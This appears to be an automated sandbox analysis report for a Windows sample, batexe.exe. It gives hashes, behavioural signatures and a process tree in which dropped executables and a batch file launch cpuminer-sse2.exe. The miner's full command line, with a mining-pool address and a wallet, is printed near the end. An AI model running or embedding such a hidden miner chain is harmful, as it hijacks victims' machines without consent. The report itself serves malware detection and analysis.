Analysis
-
max time kernel
294s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19-02-2024 16:16
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 100 b2e.exe 2844 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2844 cpuminer-sse2.exe 2844 cpuminer-sse2.exe 2844 cpuminer-sse2.exe 2844 cpuminer-sse2.exe 2844 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1432-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1432 wrote to memory of 100 1432 batexe.exe 85 PID 1432 wrote to memory of 100 1432 batexe.exe 85 PID 1432 wrote to memory of 100 1432 batexe.exe 85 PID 100 wrote to memory of 1384 100 b2e.exe 87 PID 100 wrote to memory of 1384 100 b2e.exe 87 PID 100 wrote to memory of 1384 100 b2e.exe 87 PID 1384 wrote to memory of 2844 1384 cmd.exe 89 PID 1384 wrote to memory of 2844 1384 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6FA2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\72BF.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2844
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.7MB
MD5bdb81588153661e27f216ef58f42a6a4
SHA15a7df9eba057c1a41aee1b3a5ee44db9fd71ff9f
SHA256fcf5e094cdd89b9e37a42033118d46cdf62b1a055d2f7bd4b51480698228d03b
SHA512516e8f450359223ca664385dc0341ed0a1d4867c14164e70247264e89333e2891b1854d9088d557ac83e16f8c793c17fd97396e35b73a7adfed56697879dab57
-
Filesize
2.4MB
MD506f3cc5032521a62ae96069dfc0e0006
SHA1115a1494c7b0f5b813316b169aaa1e5200cc2790
SHA256ece17a5e78a146a165625fafc06b4f74e93f72106b9532e8230d655b3cd9c437
SHA512ce57fbe6ebc57364f80811a17cd2d755cd851cdad0119f38743825fee47efe68d2018958aa944aa6c2f6d804f788cd014bbdbee660f1987487cc284ad7749136
-
Filesize
3.1MB
MD53258f8942ea10e290185eb48fc6377f2
SHA15358e4f6c78eccd4368ac6e0924ea56d05505265
SHA2561c4a3406634a7d858fa3b08864839ae3c48f5a09cc42dca84fd59323d1c46c5c
SHA5125eef6ca968cb9fc39e693a919a15dd41bda862c549173b0f920d750025675f26e60a8b33e719148c79554bbdafbe6957fc30f92d994bcaea533b6786b455698c
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.4MB
MD58755b095321a846c7763381e55d76036
SHA1967d67025173aa11f3ea23e4918f2013453c897c
SHA2560f3a70f39dc1ef1be4096b25f0800fd8a61ff86890fe8231279ddcc1e3b58c27
SHA51225df8ced0f9cf57858032952671dd5c3c1074850f2990e2c38bc80ab8296055de646fccdb3635f1c6db94405ce0487b5aa09d6b6ee33f916312fbf2f07c7eb24
-
Filesize
2.0MB
MD5cc87acc5a07cf68fd5605aee315e4b31
SHA1dfa310ce20e713ca91ec51042a65661e7c1ffc62
SHA256e40d8e9771f510bfea421599b89ffa397b06fd376d4ae068a8cd66faa83923be
SHA5126b301a5a8f639f03b38c2c198624738cea3c9e271298b18acc6af36833e4c568ab30f0c23d7f32f04e8eae189d912b248f97b4ef1bb33530260a4a3029da0131
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.8MB
MD5232ceaa223cd355c22ba590d307417c7
SHA113793484e9d51bfb70992315c842361bb5f55643
SHA2562ab29a9f9e2e1b1bbc99828c3cfe1d0eb8b4d51e31f11dd36923cf70cb68c2e1
SHA5120e02c78e1543fec9fa065135b47044688b80e97900a999c09c3e321374f764f623508511c99c8ca35c289fdc1a960ea600db102999368f3b57b6294ca3219827
-
Filesize
1.7MB
MD57e18a22f78ee740ad2d14cabc02ba08e
SHA18d3b5d25d0019060fc92f1fbe38e72e68ac68379
SHA2561c1be5331eb313dbe7a7e9f6dfd34751b3ddc3a5dd5f904f6993d9f19cca0f25
SHA5125b8c377f102baeee75d1dbb78cf3f9ed71f9d6edd1abcefa5b2d18e777b66946aaed3557b661184f2a0f437600b6333f9b93fdd1285602490434e06e9a0b4edf
-
Filesize
1.5MB
MD5094691a25771c751bc7658d890af381d
SHA15b9e598e640bb730ba4b66c9931965a881093b63
SHA25692478e1a408192bd7b667f39f5dedc456a6013226f8e8ee59e175ebd16b0cc77
SHA512ebf5bba0fd2de82a950fa2a1be4bd250a1b4f2ed78abae1fc1974b8a39dc39c6482204166d1127ca6c396d0a9d8f90f9db2ca2fd5f9822edf22c3f1082d81720
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770